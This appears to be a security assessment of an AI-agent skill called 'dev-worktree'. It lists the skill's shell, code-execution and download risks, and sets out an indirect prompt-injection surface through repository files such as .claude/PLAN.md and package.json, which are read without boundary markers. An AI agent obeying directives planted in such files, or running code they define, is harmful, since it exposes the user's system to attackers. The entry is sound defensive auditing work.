The Agent Skills Directory

[COMMAND_EXECUTION]: The skill performs several shell operations including git worktree management, local file modification (appending to .gitignore), and automated commits.
[REMOTE_CODE_EXECUTION]: The skill automatically detects and executes package installation commands and test runners (e.g., npm install, npm test, pytest, cargo test). Because these commands execute code defined within the repository's configuration files (like package.json or pytest.ini), an attacker who can modify these files can achieve code execution when the skill is run.
[EXTERNAL_DOWNLOADS]: The skill initiates external network requests to official package registries via tools like npm, pip, poetry, pixi, and go to fetch project dependencies.
[PROMPT_INJECTION]: The skill exhibits an attack surface for indirect prompt injection via untrusted repository data.
Ingestion points: Extracts feature and branch names from .claude/PLAN.md and detects project characteristics from various configuration files (package.json, Cargo.toml, go.mod, etc.).
Boundary markers: Absent; the skill does not use delimiters or instructions to ignore embedded directives when processing files from the workspace.
Capability inventory: Comprehensive shell access, git operations, package management (Node.js, Python, Rust, Go), and arbitrary code execution through test runners.
Sanitization: The skill uses sed to sanitize the feature name extracted from PLAN.md (filtering for alphanumeric characters and hyphens), which mitigates shell injection in the branch name. However, it lacks sanitization or validation for the configuration files that trigger dependency installation and test execution.

dev-worktree